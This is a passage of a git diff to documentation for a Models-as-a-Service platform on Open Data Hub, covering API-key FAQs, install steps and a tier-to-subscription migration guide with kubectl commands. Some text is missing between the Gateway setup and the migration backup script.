Those groups are stored with the key and used for authorization. The subscription name on the key is fixed at mint time; to use a different subscription, create another key with `"subscription": "<subscription-name>"`. If your groups have changed, create a new API key to pick up the new membership. 
+ +--- + +**Q: What if two MaaSSubscriptions use the same `spec.priority`?** -A: Your tier is determined by your group membership in OpenShift. Contact your platform administrator to ensure you -are in the correct user group, which should be mapped to your desired tier in the [tier mapping configuration](tier-configuration.md). +A: API key mint and subscription selection use a deterministic order when priorities tie (e.g. token limit, then name). Operators should still assign distinct priorities when possible. The MaaSSubscription controller sets status condition `SpecPriorityDuplicate` and logs when another subscription shares the same priority—use that to clean up configuration. --- -**Q: How long should my tokens be valid for?** +**Q: How long should my API keys be valid for?** -A: It's a balance of security and convenience. For interactive command-line use, 1-8 hours is common. For applications, request shorter-lived tokens (e.g., 15-60 minutes) and refresh them automatically. +A: For interactive use or long-running integrations, keys with long TTL (e.g., 90d) or the default maximum are common. For higher security, use shorter TTLs (e.g., 30d) and rotate keys periodically. --- -**Q: Can I have multiple active tokens at once?** +**Q: Can I have multiple active API keys at once?** -A: Yes. Each call to the `/v1/tokens` endpoint issues a new, independent token. All of them will be valid until they expire or are revoked. +A: Yes. Each call to `POST /v1/api-keys` creates a new, independent key. You can list and manage them via `POST /v1/api-keys/search` (with optional filters and pagination) or `GET /v1/api-keys/:id` for a specific key. --- -**Q: What happens if the `maas-api` service is down?** +**Q: What happens if the maas-api service is down?** -A: You will not be able to issue *new* tokens. However, any existing, non-expired tokens will continue to work for calling models, as the gateway validates them directly with the Kubernetes API. 
+A: You will not be able to create or validate API keys. Inference requests that use API keys will fail until the service is back. --- -**Q: Can I use one token to access multiple different models?** +**Q: Can I use one API key to access multiple different models?** -A: Yes. Your token grants you access based on your tier's RBAC permissions. If your tier is authorized to use multiple models, a single token will work for all of them. +A: Yes. Your API key is bound to a subscription at creation time. If that subscription provides access to multiple models, a single key works for all of them. To access models from a different subscription, create a new API key bound to that subscription. --- **Q: What's the difference between my OpenShift token and an API key?** -A: Your **OpenShift token** is your identity token from authentication (e.g. OpenShift or OIDC). An **API key** (issued via `/v1/tokens`) is a service account token with the correct audience and permissions for accessing models. For **GET /v1/models**, the API passes your Authorization header as-is to each model endpoint to determine which models to include; you can use your OpenShift token or an API key. For inference, use a token that your gateway accepts (e.g. OpenShift token or API key as configured). +A: Your **OpenShift token** is your identity token from authentication (e.g., OpenShift or OIDC). An **API key** is a long-lived credential created via `POST /v1/api-keys` and stored as a hash in PostgreSQL. For **GET /v1/models**, the API passes your Authorization header as-is to each model endpoint; you can use either. For inference, use an API key. --- **Q: Do I need an API key to list available models?** -A: No. Call **GET /v1/models** with your OpenShift/OIDC token (or any token your gateway accepts) in the Authorization header. The API uses that same header to probe each model endpoint and returns only models you can access. +A: No. 
Call **GET /v1/models** with your OpenShift/OIDC token (or an API key) in the Authorization header. The API uses that same header to probe each model endpoint and returns only models you can access. --- -**Q: What is "token audience" and why does it matter?** +**Q: Where is my API key stored?** -A: Token audience identifies the intended recipient of a token. Some gateways expect tokens with a specific audience. For **GET /v1/models**, the API does not modify or exchange your token; it forwards your Authorization header as-is. Once token minting is in place, audience handling may be revisited. +A: Only the SHA-256 hash of your key is stored in PostgreSQL. The plaintext key is returned once at creation and is never stored. If you lose it, you must create a new key. --- ## Related Documentation -- **[Configuring Subscription Tiers](tier-configuration.md)**: For operators - tier setup, RBAC, and rate limiting configuration +- **[Quota and Access Configuration](quota-and-access-configuration.md)**: For operators - subscription setup, access control, and rate limiting +- **[Self-Service Model Access](../user-guide/self-service-model-access.md)**: Step-by-step guide for creating and using API keys --- diff --git a/docs/content/index.md b/docs/content/index.md index 43b149015..beb90168e 100644 --- a/docs/content/index.md +++ b/docs/content/index.md @@ -2,7 +2,7 @@ Welcome to the Models-as-a-Service (MaaS) Platform documentation. -The MaaS Platform enhances the model serving capabilities of [Open Data Hub](https://github.com/opendatahub-io) by adding a management layer for self-service access control, rate limiting, and tier-based subscriptions. +The MaaS Platform enhances the model serving capabilities of [Open Data Hub](https://github.com/opendatahub-io) by adding a management layer for self-service access control, rate limiting, and subscription-based entitlements. Use this platform to streamline the deployment of your models, monitor usage, and effectively manage costs. 
@@ -15,10 +15,27 @@ Use this platform to streamline the deployment of your models, monitor usage, an ### ⚙️ Configuration & Management -- **[Tier Management](configuration-and-management/tier-overview.md)** - Configuring subscription tiers and access control -- **[Model Setup](configuration-and-management/model-setup.md)** - Setting up models for MaaS +- **[Access and Quota Overview](configuration-and-management/subscription-overview.md)** - Policies (access) and subscriptions (quota) for model access +- **[Model Setup (On Cluster)](configuration-and-management/model-setup.md)** - Setting up models for MaaS - **[Self-Service Model Access](user-guide/self-service-model-access.md)** - Managing model access and policies +### 📋 Release Notes + + ### 🔧 Advanced Administration - **[Observability](advanced-administration/observability.md)** - Monitoring, metrics, and dashboards +- **[Limitador Persistence](advanced-administration/limitador-persistence.md)** - Redis backend for persistent rate-limit counters +- **[TLS Configuration](configuration-and-management/tls-configuration.md)** - Configuring TLS for MaaS API, Authorino, and Gateway +- **[Token Management](configuration-and-management/token-management.md)** - Token authentication system and lifecycle + +### 📖 Installation Guide + +- **[Prerequisites](install/prerequisites.md)** - Requirements and database setup +- **[Platform Setup](install/platform-setup.md)** - Install ODH/RHOAI with MaaS +- **[MaaS Setup](install/maas-setup.md)** - Gateway AuthPolicy and policies +- **[Validation](install/validation.md)** - Verify your deployment + +### 🔄 Migration + +- **[Tier to Subscription Migration](migration/tier-to-subscription.md)** - Migrate from tier-based to subscription-based access control diff --git a/docs/content/install/maas-setup.md b/docs/content/install/maas-setup.md index 7b3a8f629..7f5815011 100644 --- a/docs/content/install/maas-setup.md +++ b/docs/content/install/maas-setup.md @@ -1,53 +1,192 @@ # Install 
MaaS Components -## Prerequisites +Complete [Operator Setup](platform-setup.md) before proceeding. -!!! warning "Database Required" - Before enabling MaaS, you **must** create the `maas-db-config` Secret with your PostgreSQL database connection URL. +**Installation flow:** - See the [Database Prerequisites](prerequisites.md#database-prerequisite) for detailed setup instructions and database options. +1. [Database Setup](#database-setup) — Create the PostgreSQL connection Secret +2. [Create Gateway](#create-gateway) — Deploy maas-default-gateway (required before modelsAsService) +3. [Configure DataScienceCluster](#configure-datasciencecluster) — Enable KServe and modelsAsService in your DataScienceCluster +4. [Model Setup (On Cluster)](model-setup.md) — Deploy sample models +5. [Validation](validation.md) — Verify the deployment -## Enable MaaS in DataScienceCluster +## Database Setup -After creating the database Secret, enable MaaS in your DataScienceCluster (set `modelsAsService.managementState: Managed` -in the `spec.components.kserve` section - see [platform setup guide](platform-setup.md#install-platform-with-model-serving) -for the complete configuration). +A PostgreSQL database is required. 
Create the `maas-db-config` Secret in your ODH/RHOAI namespace (typically `opendatahub` for ODH or `redhat-ods-applications` for RHOAI): -The operator will automatically deploy: - -- **MaaS API** (Deployment, Service, ServiceAccount, ClusterRole, ClusterRoleBinding, HTTPRoute) -- **MaaS API AuthPolicy** (maas-api-auth-policy) - Protects the MaaS API endpoint -- **NetworkPolicy** (maas-authorino-allow) - Allows Authorino to reach MaaS API - -## Manual Installation Steps - -You must manually install the following components after completing the [platform setup](platform-setup.md) -(which includes creating the required `maas-default-gateway`): - -The tools you will need: +```bash +kubectl create secret generic maas-db-config \ + -n opendatahub \ + --from-literal=DB_CONNECTION_URL='postgresql://username:password@hostname:5432/database?sslmode=require' +``` -* `kubectl` or `oc` client (this guide uses `kubectl`) -* `kustomize` -* `envsubst` +**Connection string format:** +``` +postgresql://USERNAME:PASSWORD@HOSTNAME:PORT/DATABASE?sslmode=require +``` -## Install Gateway AuthPolicy +!!! note "Development" + For development, you can deploy a PostgreSQL instance and Secret using the setup script: + + ```bash + ./scripts/setup-database.sh + ``` + + Use `NAMESPACE=redhat-ods-applications` for RHOAI. The full `scripts/deploy.sh` script also creates PostgreSQL automatically when deploying MaaS. + +!!! note "Restarting maas-api" + If you add or update the Secret after the DataScienceCluster already has modelsAsService in managed state, restart the maas-api deployment to pick up the config: + + ```bash + kubectl rollout restart deployment/maas-api -n opendatahub + ``` + + This is not required when the Secret exists before enabling modelsAsService in your DataScienceCluster. + +## Create Gateway + +The Gateway must exist before enabling modelsAsService in your DataScienceCluster. Create the MaaS Gateway: + +!!! 
warning "Example Gateway Configuration" + The Gateway configuration below is an example. You may need TLS certificates, specific listener settings, or custom infrastructure labels depending on your cluster. For TLS setup, see [TLS Configuration](../configuration-and-management/tls-configuration.md). To quickly apply Authorino TLS for maas-api communication, run: + + ```bash + ./scripts/setup-authorino-tls.sh + ``` + +```yaml +CLUSTER_DOMAIN=$(kubectl get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}') +# Use default ingress cert for HTTPS, or set CERT_NAME to your TLS secret name +CERT_NAME=${CERT_NAME:-$(kubectl get ingresscontroller default -n openshift-ingress-operator -o jsonpath='{.spec.defaultCertificate.name}' 2>/dev/null)} +[[ -z "$CERT_NAME" ]] && CERT_NAME="router-certs-default" + +kubectl apply -f - </dev/null 2>&1; then + kubectl get configmap tier-to-group-mapping -n maas-api -o yaml > migration-backup/tier-to-group-mapping.yaml + echo "Backed up tier-to-group-mapping" +else + echo "No tier-to-group-mapping ConfigMap found (skipping backup)" +fi + +# Only backup gateway-auth-policy if it exists +if kubectl get authpolicy gateway-auth-policy -n openshift-ingress >/dev/null 2>&1; then + kubectl get authpolicy gateway-auth-policy -n openshift-ingress -o yaml > migration-backup/gateway-auth-policy.yaml + echo "Backed up gateway-auth-policy" +else + echo "No gateway-auth-policy found (skipping backup)" +fi + +# Backup tokenratelimitpolicy resources if they exist +if kubectl get tokenratelimitpolicy -n openshift-ingress >/dev/null 2>&1; then + kubectl get tokenratelimitpolicy -n openshift-ingress -o yaml > migration-backup/gateway-rate-limits.yaml + echo "Backed up tokenratelimitpolicy resources" +else + echo "No tokenratelimitpolicy resources found (skipping backup)" +fi + +# Backup llminferenceservice resources if they exist +if kubectl get llminferenceservice -n llm >/dev/null 2>&1; then + kubectl get llminferenceservice -n llm -o yaml 
> migration-backup/llm-models.yaml + echo "Backed up llminferenceservice resources" +else + echo "No llminferenceservice resources found (skipping backup)" +fi +``` + +## Migration Strategies + +### Option A: Zero-Downtime (Recommended) + +Run both old and new systems in parallel, validate the new system, then switch over. + +**Advantages:** +- No service interruption +- Safe rollback if issues arise +- Time to validate new configuration + +**Approach:** +1. Install maas-controller (creates gateway defaults) +2. Create new MaaS CRs alongside existing tier configuration +3. Validate new system works correctly +4. Remove old tier-based configuration + +### Option B: Full Cutover (Requires Downtime) + +Replace old system with new system in one maintenance window. + +**Advantages:** +- Simpler process +- Faster migration + +**Disadvantages:** +- Service downtime during migration +- Less time for validation + +## Step-by-Step Migration (Zero-Downtime) + +### Phase 1: Install maas-controller + +If maas-controller is not already installed: + +```bash +# Deploy maas-controller +kubectl apply -k deployment/base/maas-controller/default + +# Verify controller is running +kubectl get pods -n opendatahub -l app=maas-controller + +# Check controller logs +kubectl logs -n opendatahub -l app=maas-controller --tail=20 + +# Verify gateway default policies were created +kubectl get authpolicy gateway-default-auth -n openshift-ingress +kubectl get tokenratelimitpolicy gateway-default-deny -n openshift-ingress +``` + +**Important:** The maas-controller creates gateway-level default policies (`gateway-default-auth` and `gateway-default-deny`) that deny unconfigured models. These work alongside your existing tier-based policies during migration. 
+ +**Note:** The maas-controller automatically creates the subscription namespace when it starts: +- **Default behavior:** Creates the `models-as-a-service` namespace +- **Custom namespace:** If you specify `--maas-subscription-namespace custom-ns`, only `custom-ns` is created (NOT both) + +The controller creates **only one** subscription namespace - either the default `models-as-a-service` or your custom namespace. + +### Phase 2: Map Tiers to Subscriptions + +For each tier in your ConfigMap, create equivalent MaaS CRs for each model. + +#### Example: Migrating "premium" tier + +**OLD tier configuration** (from tier-to-group-mapping.yaml): +```yaml +- name: premium + description: Premium tier + level: 10 + groups: + - premium-users + - premium-group +``` + +**OLD rate limit** (from gateway TokenRateLimitPolicy): +```yaml +spec: + limits: + premium-user-tokens: + rates: + - limit: 50000 + window: 1m + when: + - predicate: auth.identity.tier == "premium" + counters: + - expression: auth.identity.userid +``` + +**OLD model annotation** (on LLMInferenceService): +```yaml +metadata: + annotations: + alpha.maas.opendatahub.io/tiers: '["premium","enterprise"]' +``` + +#### NEW subscription configuration + +For **each model** that premium tier can access, create: + +**1. MaaSModelRef** (registers model with MaaS): +```yaml +apiVersion: maas.opendatahub.io/v1alpha1 +kind: MaaSModelRef +metadata: + name: my-model-name + namespace: llm # Must be in same namespace as the LLMInferenceService +spec: + modelRef: + kind: LLMInferenceService + name: my-model-name +``` + +Apply it: +```bash +kubectl apply -f maasmodelref-my-model.yaml +``` + +**2. 
MaaSAuthPolicy** (access control - who can access): +```yaml +apiVersion: maas.opendatahub.io/v1alpha1 +kind: MaaSAuthPolicy +metadata: + name: my-model-premium-access + namespace: models-as-a-service +spec: + modelRefs: + - name: my-model-name + namespace: llm + subjects: + groups: + - name: premium-users + - name: premium-group + users: [] +``` + +Apply it: +```bash +kubectl apply -f maasauthpolicy-my-model-premium.yaml +``` + +**3. MaaSSubscription** (rate limits - billing): +```yaml +apiVersion: maas.opendatahub.io/v1alpha1 +kind: MaaSSubscription +metadata: + name: my-model-premium-subscription + namespace: models-as-a-service +spec: + owner: + groups: + - name: premium-users + - name: premium-group + users: [] + modelRefs: + - name: my-model-name + namespace: llm + tokenRateLimits: + - limit: 50000 # From old TokenRateLimitPolicy + window: 1m +``` + +Apply it: +```bash +kubectl apply -f maassubscription-my-model-premium.yaml +``` + +#### Verify controller generated policies + +The maas-controller should automatically create Kuadrant policies: + +```bash +# Check MaaSModelRef status +kubectl get maasmodelref my-model-name -n llm -o jsonpath='{.status.phase}' +# Expected: Ready + +# Check generated AuthPolicy (one per model) +kubectl get authpolicy -n llm -l maas.opendatahub.io/model=my-model-name + +# Check generated TokenRateLimitPolicy (one per model) +kubectl get tokenratelimitpolicy -n llm -l maas.opendatahub.io/model=my-model-name + +# View full status +kubectl describe maasmodelref my-model-name -n llm +``` + +#### Automation Script + +To simplify migration, use the provided script: + +```bash +# Generate MaaS CRs from existing tier configuration +./scripts/migrate-tier-to-subscription.sh \ + --tier premium \ + --models my-model-1,my-model-2,my-model-3 \ + --groups premium-users \ + --rate-limit 50000 \ + --output migration-crs/ + +# Review generated CRs +ls migration-crs/ + +# Apply generated CRs +kubectl apply -f migration-crs/ +``` + +> **Note:** 
Resources generated by the migration script are automatically labeled with: +> - `migration.maas.opendatahub.io/generated=true` - Identifies script-generated resources +> - `migration.maas.opendatahub.io/from-tier=` - Tracks which tier they came from +> +> You can use these labels to manage or rollback migration resources: +> ```bash +> # List all script-generated resources +> kubectl get maasmodelref -n llm -l migration.maas.opendatahub.io/generated=true +> kubectl get maasauthpolicy,maassubscription -n models-as-a-service -l migration.maas.opendatahub.io/generated=true +> +> # Delete resources from a specific tier migration +> kubectl delete maasmodelref -n llm -l migration.maas.opendatahub.io/from-tier=premium +> kubectl delete maasauthpolicy,maassubscription -n models-as-a-service -l migration.maas.opendatahub.io/from-tier=premium +> ``` + +See [Migration Script](#migration-automation-script) section below for details. + +### Phase 3: Validate New Configuration + +Test each migrated model to ensure the new subscription model works correctly: + +```bash +# 1. Check all MaaS CRs are Ready +kubectl get maasmodelref -n llm +kubectl get maasauthpolicy -n models-as-a-service +kubectl get maassubscription -n models-as-a-service + +# 2. Check generated Kuadrant policies +kubectl get authpolicy -n llm +kubectl get tokenratelimitpolicy -n llm + +# 3. 
Test inference as a user in the premium group + +# ⚠️ SECURITY WARNING: Token Handling +# The examples below store bearer tokens in shell variables, which can leak via: +# - Shell history files (~/.bash_history, ~/.zsh_history) +# - Process listings (ps, /proc) +# - Environment variable dumps +# +# For production or sensitive environments, use one of these safer alternatives: +# +# Option A: Secure token file with restricted permissions +# mkdir -p ~/.kube/tokens +# chmod 700 ~/.kube/tokens +# oc whoami -t > ~/.kube/tokens/current +# chmod 600 ~/.kube/tokens/current +# # Use in curl: -H "Authorization: Bearer $(cat ~/.kube/tokens/current)" +# # Clean up after use: rm -f ~/.kube/tokens/current +# +# Option B: Disable shell history for this session +# set +o history # Disable history (bash/zsh) +# TOKEN=$(oc whoami -t) +# # ... run commands ... +# unset TOKEN # Clear token from environment +# set -o history # Re-enable history +# +# For demonstration purposes, the examples use TOKEN variables. +# Always clear sensitive tokens after use with: unset TOKEN + +oc login --username=premium-user # Or use existing token + +# Discover gateway host +HOST="maas.$(kubectl get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}')" + +# Safer approach: Use token file with restricted permissions +mkdir -p ~/.kube/tokens && chmod 700 ~/.kube/tokens +oc whoami -t > ~/.kube/tokens/current && chmod 600 ~/.kube/tokens/current + +# Test model access +curl -H "Authorization: Bearer $(cat ~/.kube/tokens/current)" \ + "https://${HOST}/llm/my-model-name/v1/chat/completions" \ + -H "Content-Type: application/json" \ + -d '{"model":"my-model-name","messages":[{"role":"user","content":"test"}],"max_tokens":10}' + +# Expected: 200 OK with model response + +# 4. 
Test rate limiting +for i in {1..60}; do + curl -s -o /dev/null -w "%{http_code}\n" \ + -H "Authorization: Bearer $(cat ~/.kube/tokens/current)" \ + "https://${HOST}/llm/my-model-name/v1/chat/completions" \ + -H "Content-Type: application/json" \ + -d '{"model":"my-model-name","messages":[{"role":"user","content":"test"}],"max_tokens":10}' +done | sort | uniq -c +# Expected: Mix of 200 and 429 responses based on rate limit + +# 5. Test unauthorized user (should get 403) +oc login --username=unauthorized-user +oc whoami -t > ~/.kube/tokens/current && chmod 600 ~/.kube/tokens/current + +curl -v -H "Authorization: Bearer $(cat ~/.kube/tokens/current)" \ + "https://${HOST}/llm/my-model-name/v1/chat/completions" \ + -H "Content-Type: application/json" \ + -d '{"model":"my-model-name","messages":[{"role":"user","content":"test"}],"max_tokens":10}' +# Expected: 403 Forbidden + +# Clean up token file after use +rm -f ~/.kube/tokens/current + +# 6. Use validation script +./scripts/validate-deployment.sh +``` + +### Phase 4: Remove Old Configuration + +Once new system is validated and working correctly: + +#### 4.1 Remove tier annotations from models + +```bash +# Remove tier annotations from all models +# Track failures to ensure all annotations are removed +failed_models=() + +# Use process substitution to avoid subshell issue with pipe +while read model; do + if kubectl annotate $model -n llm alpha.maas.opendatahub.io/tiers- --ignore-not-found; then + echo "✓ Removed tier annotation from $model" + else + echo "✗ Failed to remove tier annotation from $model" >&2 + failed_models+=("$model") + fi +done < <(kubectl get llminferenceservice -n llm -o name) + +# Report any failures +if [ ${#failed_models[@]} -gt 0 ]; then + echo "" + echo "⚠️ WARNING: Failed to remove tier annotations from the following models:" >&2 + printf ' - %s\n' "${failed_models[@]}" >&2 + echo "" + echo "Please manually remove annotations from these models:" >&2 + for model in "${failed_models[@]}"; do + 
echo " kubectl annotate $model -n llm alpha.maas.opendatahub.io/tiers-" >&2 + done + exit 1 +else + echo "" + echo "✓ Successfully removed tier annotations from all models" +fi +``` + +#### 4.2 Delete old gateway-auth-policy (if exists) + +```bash +# Check if gateway-auth-policy exists +kubectl get authpolicy gateway-auth-policy -n openshift-ingress + +# Delete it (gateway-default-auth replaces it) +kubectl delete authpolicy gateway-auth-policy -n openshift-ingress --ignore-not-found +``` + +#### 4.3 Update or remove gateway-level TokenRateLimitPolicy + +The old TokenRateLimitPolicy has tier-based predicates that are no longer needed. + +**Option A: Remove tier-based limits** +```bash +# Edit and remove tier-based limit rules (kubectl edit requires the policy name) +kubectl edit tokenratelimitpolicy <old-policy-name> -n openshift-ingress + +# Remove sections like: +# premium-user-tokens: +# when: +# - predicate: auth.identity.tier == "premium" +``` + +**Option B: Delete if fully replaced** +```bash +# If gateway-default-deny provides sufficient default, delete the old policy by name. +# Do NOT delete gateway-default-deny itself - it is the controller-managed default. +kubectl delete tokenratelimitpolicy <old-policy-name> -n openshift-ingress +``` + +**Note:** `gateway-default-deny` (created by maas-controller) provides default rate limiting (0 tokens for unconfigured models). 
+ +#### 4.4 Handle tier-to-group-mapping ConfigMap + +**Option A: Keep ConfigMap** (if MaaS API uses it for other features) +```bash +# Keep ConfigMap but document that tiers are deprecated +kubectl annotate configmap tier-to-group-mapping -n maas-api \ + deprecated="true" \ + deprecated-reason="Migrated to subscription model" \ + --overwrite +``` + +**Option B: Delete ConfigMap** (if no longer needed) +```bash +# Verify MaaS API doesn't use /v1/tiers/lookup endpoint +# Check maas-api logs for tier lookup calls + +# Delete ConfigMap +kubectl delete configmap tier-to-group-mapping -n maas-api +``` + +### Phase 5: ODH Model Controller Considerations + +**Context:** If you have ODH Model Controller deployed (from `github.com/opendatahub-io/odh-model-controller`), it may manage AuthPolicies for LLMInferenceServices. + +#### Check if ODH Model Controller is managing AuthPolicies + +```bash +# Check for ODH Model Controller deployment +kubectl get deployment odh-model-controller -n opendatahub + +# Check for ODH-managed AuthPolicies +kubectl get authpolicy -A -l app.kubernetes.io/managed-by=odh-model-controller +``` + +#### If ODH Model Controller manages AuthPolicies + +**Scenario 1: ODH creates AuthPolicies, maas-controller also creates AuthPolicies** + +- Potential conflict: Both controllers may try to manage policies +- **Resolution:** Use annotation to opt out ODH management for MaaS-managed models + +```bash +# Opt out ODH management for specific AuthPolicy +kubectl annotate authpolicy <authpolicy-name> -n <namespace> \ + opendatahub.io/managed=false +``` + +**Scenario 2: Coordinate with ODH team** + +- Contact ODH team to understand AuthPolicy management strategy +- Determine if ODH Model Controller's AuthPolicy creation should be disabled for MaaS models +- Consider updating ODH Model Controller configuration + +**Scenario 3: No ODH Model Controller or no AuthPolicy management** + +- No action needed +- maas-controller is sole owner of AuthPolicies + +#### Verify no conflicts + +```bash +# 
Check for duplicate AuthPolicies targeting same HTTPRoute +kubectl get authpolicy -A -o json | \ + jq -r '.items[] | select(.spec.targetRef != null and .spec.targetRef.kind == "HTTPRoute") | "\(.metadata.namespace)/\(.metadata.name) -> \(.spec.targetRef.name // "")"' | \ + sort + +# Look for multiple policies targeting the same HTTPRoute +# Expected: One AuthPolicy per HTTPRoute (created by maas-controller) +# If an entry shows an empty name after "->", investigate that AuthPolicy for a missing targetRef.name +``` + +## Migration Automation Script + +A migration script is provided to automate CR generation from existing tier configuration. + +### Usage + +```bash +./scripts/migrate-tier-to-subscription.sh [OPTIONS] +``` + +### Options + +| Flag | Description | Example | +|------|-------------|---------| +| `--tier <name>` | Tier name from ConfigMap | `--tier premium` | +| `--models <list>` | Comma-separated model names | `--models model1,model2` | +| `--groups <list>` | Comma-separated group names (auto-detected if omitted) | `--groups premium-users` | +| `--rate-limit <limit>` | Token rate limit | `--rate-limit 50000` | +| `--window <window>` | Rate limit window (default: 1m) | `--window 1m` | +| `--output <dir>` | Output directory for CRs (default: migration-crs) | `--output migration-crs/` | +| `--subscription-ns <ns>` | Subscription namespace (default: models-as-a-service) | `--subscription-ns models-as-a-service` | +| `--model-ns <ns>` | Model namespace (default: llm) | `--model-ns llm` | +| `--maas-ns <ns>` | MaaS namespace (default: opendatahub) | `--maas-ns opendatahub` | +| `--dry-run` | Generate files without applying | `--dry-run` | +| `--apply` | Apply generated CRs to cluster | `--apply` | +| `--verbose` | Enable verbose logging | `--verbose` | +| `--help` | Show help message | `--help` | + +### Examples + +**Example 1: Generate CRs for premium tier** +```bash +./scripts/migrate-tier-to-subscription.sh \ + --tier premium \ + --models model-a,model-b,model-c \ + --groups premium-users \ + --rate-limit 50000 \ + --window 1m \ 
--output migration-crs/premium/ \ + --dry-run +``` + +**Example 2: Generate and apply for all tiers** +```bash +# Free tier +./scripts/migrate-tier-to-subscription.sh \ + --tier free \ + --models simulator,qwen3 \ + --groups system:authenticated \ + --rate-limit 100 \ + --window 1m \ + --output migration-crs/free/ \ + --apply + +# Premium tier +./scripts/migrate-tier-to-subscription.sh \ + --tier premium \ + --models simulator,qwen3,llama \ + --groups premium-users \ + --rate-limit 50000 \ + --window 1m \ + --output migration-crs/premium/ \ + --apply + +# Enterprise tier +./scripts/migrate-tier-to-subscription.sh \ + --tier enterprise \ + --models simulator,qwen3,llama,gpt \ + --groups enterprise-users \ + --rate-limit 100000 \ + --window 1m \ + --output migration-crs/enterprise/ \ + --apply +``` + +**Example 3: Extract tier info from ConfigMap and generate CRs** +```bash +# Get tier configuration from ConfigMap +kubectl get configmap tier-to-group-mapping -n maas-api -o yaml + +# Run script for each tier with extracted group and limit info +./scripts/migrate-tier-to-subscription.sh \ + --tier premium \ + --groups premium-users,premium-group \ + --models $(kubectl get llminferenceservice -n llm -o json | \ + jq -r '[.items[] + | . as $item + | try ( + .metadata.annotations["alpha.maas.opendatahub.io/tiers"] | fromjson + ) catch ( + (env.DEBUG // "" | if . != "" then "WARN: malformed JSON in \($item.metadata.name)" | debug else empty end) | [] + ) + | if type == "array" and any(. 
== "premium") then $item.metadata.name else empty end + ] | join(",")') \ + --rate-limit 50000 \ + --output migration-crs/premium/ +``` + +## Conversion Worksheet + +Use this table to plan your migration: + +| Old Tier | Groups | Models | Rate Limit (tokens/min) | New MaaSAuthPolicy Name | New MaaSSubscription Name | +|----------|--------|--------|------------------------|------------------------|--------------------------| +| free | system:authenticated | simulator, qwen3 | 100 | free-models-access | free-models-subscription | +| premium | premium-users, premium-group | simulator, qwen3, llama | 50000 | premium-models-access | premium-models-subscription | +| enterprise | enterprise-users, admin-group | all models | 100000 | enterprise-models-access | enterprise-models-subscription | + +### Worksheet Template + +Download and fill out this worksheet before migration: + +```yaml +# migration-plan.yaml +tiers: + - name: free + groups: + - system:authenticated + models: + - simulator + - qwen3 + rateLimit: + limit: 100 + window: 1m + + - name: premium + groups: + - premium-users + - premium-group + models: + - simulator + - qwen3 + - llama + rateLimit: + limit: 50000 + window: 1m + + - name: enterprise + groups: + - enterprise-users + - admin-group + models: + - simulator + - qwen3 + - llama + - gpt + rateLimit: + limit: 100000 + window: 1m +``` + +## Rollback Plan + +If migration fails or issues arise: + +### Immediate Rollback + +```bash +# 1. List MaaS CRs created during migration (verify before deletion) +echo "=== MaaSModelRef resources ===" +kubectl get maasmodelref -n llm +echo "=== MaaSAuthPolicy resources ===" +kubectl get maasauthpolicy -n models-as-a-service +echo "=== MaaSSubscription resources ===" +kubectl get maassubscription -n models-as-a-service + +# 2. 
Delete specific MaaS CRs created during migration +# Option A: Delete by resource name (if you know the specific names) +kubectl delete maasmodelref my-model-name -n llm +kubectl delete maasauthpolicy my-model-premium-access -n models-as-a-service +kubectl delete maassubscription my-model-premium-subscription -n models-as-a-service + +# Option B: Delete all script-generated resources +kubectl delete maasmodelref -n llm -l migration.maas.opendatahub.io/generated=true +kubectl delete maasauthpolicy,maassubscription -n models-as-a-service -l migration.maas.opendatahub.io/generated=true + +# Option C: Delete resources from a specific tier migration +kubectl delete maasmodelref -n llm -l migration.maas.opendatahub.io/from-tier=premium +kubectl delete maasauthpolicy,maassubscription -n models-as-a-service -l migration.maas.opendatahub.io/from-tier=premium + +# 3. Re-apply old gateway-auth-policy (if it was backed up) +if [ -f migration-backup/gateway-auth-policy.yaml ]; then + kubectl apply -f migration-backup/gateway-auth-policy.yaml + echo "Restored gateway-auth-policy" +else + echo "No gateway-auth-policy backup found (skipping restore)" +fi + +# 4. Re-apply old TokenRateLimitPolicy (if backed up) +if [ -f migration-backup/gateway-rate-limits.yaml ]; then + kubectl apply -f migration-backup/gateway-rate-limits.yaml + echo "Restored gateway-rate-limits" +else + echo "No gateway-rate-limits backup found (skipping restore)" +fi + +# 5. Re-add tier annotations to models +kubectl annotate llminferenceservice my-model-name -n llm \ + alpha.maas.opendatahub.io/tiers='["premium","enterprise"]' \ + --overwrite + +# 6. Re-apply tier-to-group-mapping ConfigMap (if backed up) +if [ -f migration-backup/tier-to-group-mapping.yaml ]; then + kubectl apply -f migration-backup/tier-to-group-mapping.yaml + echo "Restored tier-to-group-mapping" +else + echo "No tier-to-group-mapping backup found (skipping restore)" +fi + +# 7. 
Restart MaaS API to reload tier configuration +kubectl rollout restart deployment/maas-api -n opendatahub +``` + +### Rollback Validation + +```bash +# Test tier-based system is working +# Using secure token file (see Phase 3 security warning for details) +mkdir -p ~/.kube/tokens && chmod 700 ~/.kube/tokens +oc whoami -t > ~/.kube/tokens/current && chmod 600 ~/.kube/tokens/current + +HOST="maas.$(kubectl get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}')" + +curl -H "Authorization: Bearer $(cat ~/.kube/tokens/current)" \ + "https://${HOST}/llm/my-model-name/v1/chat/completions" \ + -H "Content-Type: application/json" \ + -d '{"model":"my-model-name","messages":[{"role":"user","content":"test"}],"max_tokens":10}' + +# Expected: 200 OK (tier-based system restored) + +# Clean up token file +rm -f ~/.kube/tokens/current +``` + +### Partial Rollback + +If only some models have issues, you can rollback specific models: + +```bash +# Delete MaaS CRs for specific model only +kubectl delete maasmodelref my-model-name -n llm +kubectl delete maasauthpolicy my-model-premium-access -n models-as-a-service +kubectl delete maassubscription my-model-premium-subscription -n models-as-a-service + +# Re-add tier annotation to that model +kubectl annotate llminferenceservice my-model-name -n llm \ + alpha.maas.opendatahub.io/tiers='["premium","enterprise"]' \ + --overwrite +``` + +## Troubleshooting + +### Models return 401 Unauthorized + +**Symptom:** Models return 401 after migration + +**Possible Causes:** +- No MaaSAuthPolicy exists for the model +- User not authenticated +- gateway-default-auth denying request + +**Resolution:** +```bash +# Check if MaaSAuthPolicy exists for the model +kubectl get maasauthpolicy -n models-as-a-service -o json | \ + jq -r '.items[] | select(.spec.modelRefs[]? | .name? 
